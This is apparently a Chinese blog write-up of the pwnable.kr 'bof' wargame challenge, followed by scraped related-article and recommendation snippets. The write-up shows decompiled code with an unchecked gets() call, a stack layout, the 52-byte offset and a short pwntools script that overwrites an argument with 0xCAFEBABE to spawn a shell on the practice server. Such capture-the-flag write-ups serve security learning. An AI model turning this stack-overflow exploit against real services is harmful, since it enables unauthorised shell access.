Running at : nc pwnable.kr 9000

IDA查看

 1 unsigned int __cdecl func(int a1)

 2 {

 3   char s; // [esp+1Ch] [ebp-2Ch]

 4   unsigned int v3; // [esp+3Ch] [ebp-Ch]

 5

 6   v3 = __readgsdword(0x14u);

 7   puts("overflow me : ");

 8   gets(&s);//未对输入长度进行限制,存在栈溢出

 9   if ( a1 == 0xCAFEBABE )

10     system("/bin/sh");

11   else

12     puts("Nah..");

13   return __readgsdword(0x14u) ^ v3;

14 }

查看栈,

 1 -0000002C s               db ?

 2 -0000002B                 db ? ; undefined

 3 -0000002A                 db ? ; undefined

 4 -00000029                 db ? ; undefined

 5 -00000028                 db ? ; undefined

 6 -00000027                 db ? ; undefined

 7 -00000026                 db ? ; undefined

 8 -00000025                 db ? ; undefined

 9 -00000024                 db ? ; undefined

10 -00000023                 db ? ; undefined

11 -00000022                 db ? ; undefined

12 -00000021                 db ? ; undefined

13 -00000020                 db ? ; undefined

14 -0000001F                 db ? ; undefined

15 -0000001E                 db ? ; undefined

16 -0000001D                 db ? ; undefined

17 -0000001C                 db ? ; undefined

18 -0000001B                 db ? ; undefined

19 -0000001A                 db ? ; undefined

20 -00000019                 db ? ; undefined

21 -00000018                 db ? ; undefined

22 -00000017                 db ? ; undefined

23 -00000016                 db ? ; undefined

24 -00000015                 db ? ; undefined

25 -00000014                 db ? ; undefined

26 -00000013                 db ? ; undefined

27 -00000012                 db ? ; undefined

28 -00000011                 db ? ; undefined

29 -00000010                 db ? ; undefined

30 -0000000F                 db ? ; undefined

31 -0000000E                 db ? ; undefined

32 -0000000D                 db ? ; undefined

33 -0000000C var_C           dd ?

34 -00000008                 db ? ; undefined

35 -00000007                 db ? ; undefined

36 -00000006                 db ? ; undefined

37 -00000005                 db ? ; undefined

38 -00000004                 db ? ; undefined

39 -00000003                 db ? ; undefined

40 -00000002                 db ? ; undefined

41 -00000001                 db ? ; undefined

42 +00000000  s              db 4 dup(?)

43 +00000004  r              db 4 dup(?)

44 +00000008 arg_0           dd ?

45 +0000000C

46 +0000000C ; end of stack variables

0x2c+8 =0x34=52,来到arg_0的存储空间

exp:

 1 from pwn import *

 2

 3 r = remote('pwnable.kr','9000')

 4

 5 buf = 52 * 'A'

 6 buf += p32(0xcafebabe)

 7

 8 r.sendline(buf)

 9

10 r.interactive()

pwnable.kr第三题bof的更多相关文章

  1. 【pwnable.kr】fb

    这是pwnable.kr的签到题,记录pwn入门到放弃的第一篇. ssh fd@pwnable.kr -p2222 (pw:guest) 题目很简单,登录上了ssh后,发现了3个文件:fd,fd.c, ...

  2. 【pwnable.kr】blackjack

    又一道pwnable nc pwnable.kr 9009 读题找到源代码在:http://cboard.cprogramming.com/c-programming/114023-simple-bl ...

  3. pwnable.kr之brainf*ck

    pwnable.kr之brainf*ck 今天又是被难倒的一天Orz,个人感觉pwnable.kr上的题都比较剑走偏锋,仔细做过去,一定会有很大的收获. 不多说了,今天看的是第二关的第一道题:brai ...

  4. 【pwnable.kr】bof

    pwnable从入门到放弃,第三题. Download : http://pwnable.kr/bin/bofDownload : http://pwnable.kr/bin/bof.c Runnin ...

  5. pwnable.kr bof之write up

    这一题与前两题不同,用到了静态调试工具ida 首先题中给出了源码: #include <stdio.h> #include <string.h> #include <st ...

  6. pwnable.kr之bof

    打开题目: 先下载题目给我们的两个文件,查看文件信息: 发现没有执行的权限,所以先增加文件bof的执行权限,执行: 没发现啥,然后查看代码, #include <stdio.h> #inc ...

  7. pwnable.kr 第一题fd

    使用ssh fd@pwnable.kr -p2222连接输入密码guest 1 fd@prowl:~$ ls -al 2 total 40 3 drwxr-x--- 5 root fd 4096 Oc ...

  8. pwnable.kr的passcode

    前段时间找到一个练习pwn的网站,pwnable.kr 这里记录其中的passcode的做题过程,给自己加深印象. 废话不多说了,看一下题目, 看到题目,就ssh连接进去,就看到三个文件如下 看了一下 ...

  9. pwnable.kr详细通关秘籍(二)

    i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考 ...

随机推荐

  1. Linux 驱动框架---cdev字符设备驱动和misc杂项设备驱动

    字符设备 Linux中设备常见分类是字符设备,块设备.网络设备,其中字符设备也是Linux驱动中最常用的设备类型.因此开发Linux设备驱动肯定是要先学习一下字符设备的抽象的.在内核中使用struct ...

  2. 最新 Steam 免费游戏

    最新 Steam 免费游戏 免费 免费游戏 免费开玩 免费游戏玩的游戏是有内购的. 免费开玩游戏开玩是一部分免费,玩到某个地方要购买才能继续玩. 免费就是永久免费并且无内购. refs https:/ ...

  3. PIP & Python packages management

    PIP & Python packages management $ python3 --version # OR $ python3 -V # Python 3.7.3 $ pip --ve ...

  4. css3 units & 1 turn

    css3 units & 1 turn One full circle is 1turn, 180deg === 0.5turn degrees, gradians, radians, tur ...

  5. vue & vue router & match bug

    vue & vue router & match bug match bugs solution name must be router https://stackoverflow.c ...

  6. 专注于大数据分析和数字基建,星盟UICI切入资产管理领域

    资产管理行业体系庞大,按领域可以大致分为公募.私募.券商.保险.银行.信托六大领域.面对六大领域百万亿级市场,近年来,也出现了不少初创公司针对资产管理的细分领域提供专有解决方案.而星盟全球投资公司就是 ...

  7. django中间件介绍

    在学习django中间件之前,先来认识一下django的生命周期,如下图所示: django生命周期:浏览器发送的请求会先经过wsgiref模块处理解析出request(请求数据)给到中间件,然后通过 ...

  8. 使用PowerDesigner进行数据库设计并直接把设计好的表导出相应的建表语句

    Power Designer:数据库表设计工具 PowerDesigner是Sybase公司的一款软件,使用它可以方便地对系统进行分析设计,他几乎包括了数据库模型设计的全过程.利用PowerDesig ...

  9. Dubbo与Zookeeper开发

    1.Dubbo 1.1RPC RPC全称是remote procedure call,即远程过程调用.比如有两台服务器A和B,它们上面分别部署了一个服务.此时B服务器想调用A服务器上提供的方法,由于不 ...

  10. python进阶(6)深拷贝和浅拷贝

    深拷贝和浅拷贝 不管对于浅拷贝.还是深拷贝,针对不可变对象str.int.tuple(有点特殊).boolean,它的内存地址是不变的,拷贝的仅仅是值 import copy a = 1 b = co ...